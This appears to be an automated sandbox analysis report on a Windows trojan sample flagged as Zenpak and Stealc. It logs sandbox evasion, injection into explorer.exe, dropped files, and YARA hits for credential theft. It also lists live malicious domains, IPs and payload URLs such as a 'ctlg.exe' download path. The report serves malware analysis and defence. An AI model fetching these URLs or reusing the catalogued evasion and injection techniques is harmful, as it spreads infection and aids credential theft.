              Source: C:\Users\user\Desktop\3WaqgS34S7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vdhivcvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vdhivcvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vdhivcvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vdhivcvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vdhivcvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Roaming\vdhivcvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
              Source: C:\Users\user\AppData\Roaming\vdhivcvAPI/Special instruction interceptor: Address: 7FFE2220E814
              Source: C:\Users\user\AppData\Roaming\vdhivcvAPI/Special instruction interceptor: Address: 7FFE2220D584
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
              Source: vdhivcv, 00000005.00000002.1983433856.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 467Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2924Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 870Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 358Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 353Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1911Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 878Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 877Jump to behavior
              Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F8FA.exeJump to dropped file
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5408
              Source: C:\Users\user\AppData\Roaming\vdhivcvEvasive API call chain: GetSystemTime,DecisionNodesgraph_5-5417
              Source: C:\Users\user\AppData\Roaming\wrhivcvEvasive API call chain: GetSystemTime,DecisionNodesgraph_8-4774
              Source: C:\Users\user\AppData\Roaming\wrhivcvEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_8-3986
              Source: C:\Users\user\AppData\Roaming\wrhivcvEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_8-4377
              Source: C:\Users\user\AppData\Roaming\wrhivcvAPI coverage: 0.4 %
              Source: C:\Windows\explorer.exe TID: 2536Thread sleep count: 467 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 1868Thread sleep count: 2924 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 1868Thread sleep time: -292400s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 180Thread sleep count: 870 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 180Thread sleep time: -87000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 6668Thread sleep count: 358 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 2924Thread sleep count: 349 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 2924Thread sleep time: -34900s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 6516Thread sleep count: 353 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 6516Thread sleep time: -35300s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 1868Thread sleep count: 1911 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 1868Thread sleep time: -191100s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\wrhivcvCode function: 8_2_0041D240 GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLastError,GetLastError,GetStringTypeExA,BuildCommDCBW,GetTimeFormatA,SetThreadAffinityMask,GetConsoleAliasExesLengthA,OpenWaitableTimerA,GetProcessHandleCount,GetLocaleInfoA,_calloc,_realloc,_malloc,_calloc,InterlockedCompareExchange,GetSystemWindowsDirectoryW,WriteConsoleA,GetModuleHandleA,SetThreadContext,FindAtomA,_memset,SetDefaultCommConfigW,GetConsoleAliasW,MoveFileW,ConnectNamedPipe,ReadConsoleOutputA,GetModuleFileNameA,OpenFileMappingA,LocalAlloc,InterlockedDecrement,GetSystemTime,QueryMemoryResourceNotification,InterlockedDecrement,GetSystemTime,WriteConsoleOutputCharacterA,WriteConsoleOutputCharacterA,GetMonitorInfoA,GetClassLongW,GetMonitorInfoA,GetClassLongW,8_2_0041D240
              Source: explorer.exe, 00000001.00000000.1731700485.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: explorer.exe, 00000001.00000000.1731194544.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
              Source: explorer.exe, 00000001.00000000.1731194544.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
              Source: explorer.exe, 00000001.00000000.1731700485.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
              Source: explorer.exe, 00000001.00000000.1720994165.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
              Source: explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000001.00000000.1731700485.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
              Source: explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
              Source: explorer.exe, 00000001.00000000.1731194544.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
              Source: explorer.exe, 00000001.00000000.1731194544.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1731194544.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: explorer.exe, 00000001.00000000.1731700485.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: explorer.exe, 00000001.00000000.1729546145.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
              Source: explorer.exe, 00000001.00000000.1731194544.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
              Source: explorer.exe, 00000001.00000000.1720994165.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: explorer.exe, 00000001.00000000.1720994165.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\user\AppData\Roaming\wrhivcvAPI call chain: ExitProcess graph end nodegraph_8-4379
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeSystem information queried: CodeIntegrityInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\vdhivcvSystem information queried: CodeIntegrityInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeSystem information queried: CodeIntegrityInformationJump to behavior
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\vdhivcvProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\wrhivcvCode function: 8_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00401000
              Source: C:\Users\user\AppData\Roaming\wrhivcvCode function: 8_2_004050FA LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,8_2_004050FA
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_009A0D90 mov eax, dword ptr fs:[00000030h]0_2_009A0D90
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_009A092B mov eax, dword ptr fs:[00000030h]0_2_009A092B
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_009F0216 push dword ptr fs:[00000030h]0_2_009F0216
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_009A0D90 mov eax, dword ptr fs:[00000030h]5_2_009A0D90
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_009A092B mov eax, dword ptr fs:[00000030h]5_2_009A092B
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: 5_2_00A7EF06 push dword ptr fs:[00000030h]5_2_00A7EF06
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00880D90 mov eax, dword ptr fs:[00000030h]7_2_00880D90
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_0088092B mov eax, dword ptr fs:[00000030h]7_2_0088092B
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: 7_2_00A3F268 push dword ptr fs:[00000030h]7_2_00A3F268
              Source: C:\Users\user\AppData\Roaming\wrhivcvCode function: 8_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00401000
              Source: C:\Users\user\AppData\Roaming\wrhivcvCode function: 8_2_004030A9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_004030A9
              Source: C:\Users\user\AppData\Roaming\wrhivcvCode function: 8_2_00404569 SetUnhandledExceptionFilter,8_2_00404569
              Source: C:\Users\user\AppData\Roaming\wrhivcvCode function: 8_2_0040656A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0040656A

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\explorer.exeFile created: 7E95.exe.1.drJump to dropped file
              Source: C:\Windows\explorer.exeNetwork Connect: 103.35.190.240 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 207.246.75.248 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 123.213.233.131 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.181 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 189.163.166.52 80Jump to behavior
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeThread created: C:\Windows\explorer.exe EIP: 13519D0Jump to behavior
              Source: C:\Users\user\AppData\Roaming\vdhivcvThread created: unknown EIP: 34419D0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeThread created: unknown EIP: 3191970Jump to behavior
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
              Source: C:\Users\user\AppData\Roaming\vdhivcvSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\vdhivcvSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
              Source: explorer.exe, 00000001.00000000.1729378564.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1722544893.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1731194544.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000001.00000000.1722544893.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: explorer.exe, 00000001.00000000.1720994165.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
              Source: explorer.exe, 00000001.00000000.1722544893.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: explorer.exe, 00000001.00000000.1722544893.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: GetStringTypeA,BuildCommDCBW,GetTimeFormatA,SetThreadAffinityMask,GetConsoleAliasExesLengthA,OpenWaitableTimerA,GetProcessHandleCount,GetLocaleInfoW,GlobalAlloc,InterlockedCompareExchange,GetSystemWindowsDirectoryW,WriteConsoleA,GetModuleHandleA,GetThreadContext,FindAtomW,SetDefaultCommConfigW,GetConsoleAliasW,MoveFileW,DisconnectNamedPipe,ReadConsoleOutputA,GetModuleFileNameA,OpenFileMappingA,GlobalAlloc,InterlockedDecrement,GetSystemTime,0_2_0041C110
              Source: C:\Users\user\AppData\Roaming\vdhivcvCode function: GetStringTypeA,BuildCommDCBW,GetTimeFormatA,SetThreadAffinityMask,GetConsoleAliasExesLengthA,OpenWaitableTimerA,GetProcessHandleCount,GetLocaleInfoW,GlobalAlloc,InterlockedCompareExchange,GetSystemWindowsDirectoryW,WriteConsoleA,GetModuleHandleA,GetThreadContext,FindAtomW,SetDefaultCommConfigW,GetConsoleAliasW,MoveFileW,DisconnectNamedPipe,ReadConsoleOutputA,GetModuleFileNameA,OpenFileMappingA,GlobalAlloc,InterlockedDecrement,GetSystemTime,5_2_0041C110
              Source: C:\Users\user\AppData\Local\Temp\7E95.exeCode function: GetStringTypeA,BuildCommDCBW,GetTimeFormatA,SetThreadAffinityMask,GetConsoleAliasExesLengthA,OpenWaitableTimerA,GetProcessHandleCount,GetLocaleInfoA,InterlockedCompareExchange,GetSystemWindowsDirectoryW,WriteConsoleA,GetModuleHandleA,SetThreadContext,FindAtomA,SetDefaultCommConfigW,GetConsoleAliasW,MoveFileW,ConnectNamedPipe,ReadConsoleOutputA,GetModuleFileNameA,OpenFileMappingA,LocalAlloc,QueryMemoryResourceNotification,7_2_0041D240
              Source: C:\Users\user\AppData\Roaming\wrhivcvCode function: GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLastError,GetLastError,GetStringTypeExA,BuildCommDCBW,GetTimeFormatA,SetThreadAffinityMask,GetConsoleAliasExesLengthA,OpenWaitableTimerA,GetProcessHandleCount,GetLocaleInfoA,_calloc,_realloc,_malloc,_calloc,InterlockedCompareExchange,GetSystemWindowsDirectoryW,WriteConsoleA,GetModuleHandleA,SetThreadContext,FindAtomA,_memset,SetDefaultCommConfigW,GetConsoleAliasW,MoveFileW,ConnectNamedPipe,ReadConsoleOutputA,GetModuleFileNameA,OpenFileMappingA,LocalAlloc,InterlockedDecrement,GetSystemTime,QueryMemoryResourceNotification,InterlockedDecrement,GetSystemTime,WriteConsoleOutputCharacterA,WriteConsoleOutputCharacterA,GetMonitorInfoA,GetClassLongW,GetMonitorInfoA,GetClassLongW,8_2_0041D240
              Source: C:\Users\user\AppData\Roaming\wrhivcvCode function: GetLocaleInfoA,8_2_0040836B
              Source: C:\Users\user\Desktop\3WaqgS34S7.exeCode function: 0_2_0041C110 GetStringTypeA,BuildCommDCBW,GetTimeFormatA,SetThreadAffinityMask,GetConsoleAliasExesLengthA,OpenWaitableTimerA,GetProcessHandleCount,GetLocaleInfoW,GlobalAlloc,InterlockedCompareExchange,GetSystemWindowsDirectoryW,WriteConsoleA,GetModuleHandleA,GetThreadContext,FindAtomW,SetDefaultCommConfigW,GetConsoleAliasW,MoveFileW,DisconnectNamedPipe,ReadConsoleOutputA,GetModuleFileNameA,OpenFileMappingA,GlobalAlloc,InterlockedDecrement,GetSystemTime,0_2_0041C110

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 7.3.7E95.exe.890000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.7E95.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.7E95.exe.880e67.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000003.2776796462.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2828387793.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1983398685.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1741413707.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1741803649.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 7.3.7E95.exe.890000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.7E95.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.7E95.exe.880e67.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000003.2776796462.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1983365123.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2828263113.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2828387793.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1983398685.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1741413707.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1741803649.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
              Native API
              1
              DLL Side-Loading
              32
              Process Injection
              11
              Masquerading
              OS Credential Dumping1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              12
              Virtualization/Sandbox Evasion
              LSASS Memory521
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
              Process Injection
              Security Account Manager12
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Hidden Files and Directories
              NTDS3
              Process Discovery
              Distributed Component Object ModelInput Capture115
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information
              LSA Secrets1
              Application Window Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing
              Cached Domain Credentials2
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSync113
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              File Deletion
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565628 Sample: 3WaqgS34S7.exe Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 31 telphboardline.com 2->31 33 obozintsev.ru 2->33 35 2 other IPs or domains 2->35 51 Suricata IDS alerts for network traffic 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 7 other signatures 2->57 8 3WaqgS34S7.exe 2->8         started        11 vdhivcv 2->11         started        13 wrhivcv 2->13         started        signatures3 process4 signatures5 67 Detected unpacking (changes PE section rights) 8->67 69 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->69 71 Maps a DLL or memory area into another process 8->71 79 3 other signatures 8->79 15 explorer.exe 59 8 8->15 injected 73 Multi AV Scanner detection for dropped file 11->73 75 Machine Learning detection for dropped file 11->75 77 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->77 process6 dnsIp7 37 telphboardline.com 103.35.190.240, 443, 50064 VECTANTARTERIANetworksCorporationJP Japan 15->37 39 obozintsev.ru 189.163.166.52, 49736, 49737, 49738 UninetSAdeCVMX Mexico 15->39 41 3 other IPs or domains 15->41 23 C:\Users\user\AppData\Roaming\wrhivcv, PE32 15->23 dropped 25 C:\Users\user\AppData\Roaming\vdhivcv, PE32 15->25 dropped 27 C:\Users\user\AppData\Local\Temp\F8FA.exe, PE32 15->27 dropped 29 2 other malicious files 15->29 dropped 43 System process connects to network (likely due to code injection or exploit) 15->43 45 Benign windows process drops PE files 15->45 47 Deletes itself after installation 15->47 49 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->49 20 7E95.exe 15->20         started        file8 signatures9 process10 signatures11 59 Multi AV Scanner detection for dropped file 20->59 61 Detected unpacking (changes PE section rights) 20->61 63 Machine Learning detection for dropped file 20->63 65 5 other signatures 20->65

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              3WaqgS34S7.exe63%ReversingLabsWin32.Trojan.Zenpak
              3WaqgS34S7.exe51%VirustotalBrowse
              3WaqgS34S7.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\7E95.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\F8FA.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\wrhivcv100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\vdhivcv100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\7E95.exe55%ReversingLabsWin32.Trojan.Stealc
              C:\Users\user\AppData\Roaming\vdhivcv63%ReversingLabsWin32.Trojan.Zenpak
              C:\Users\user\AppData\Roaming\wrhivcv55%ReversingLabsWin32.Trojan.Stealc
              No Antivirus matches
              SourceDetectionScannerLabelLink
              jamforvaise.com1%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://piratekings.online/tmp/index.php0%Avira URL Cloudsafe
              http://olovge.at/tmp/index.php0%Avira URL Cloudsafe
              https://midginvineco.com/prog/ctlg.exe0%Avira URL Cloudsafe
              http://nuxc.cc/tmp/index.php0%Avira URL Cloudsafe
              http://obozintsev.ru/tmp/index.php100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              jamforvaise.com
              207.246.75.248
              truetrueunknown
              telphboardline.com
              103.35.190.240
              truetrue
                unknown
                midginvineco.com
                23.145.40.181
                truetrue
                  unknown
                  obozintsev.ru
                  189.163.166.52
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
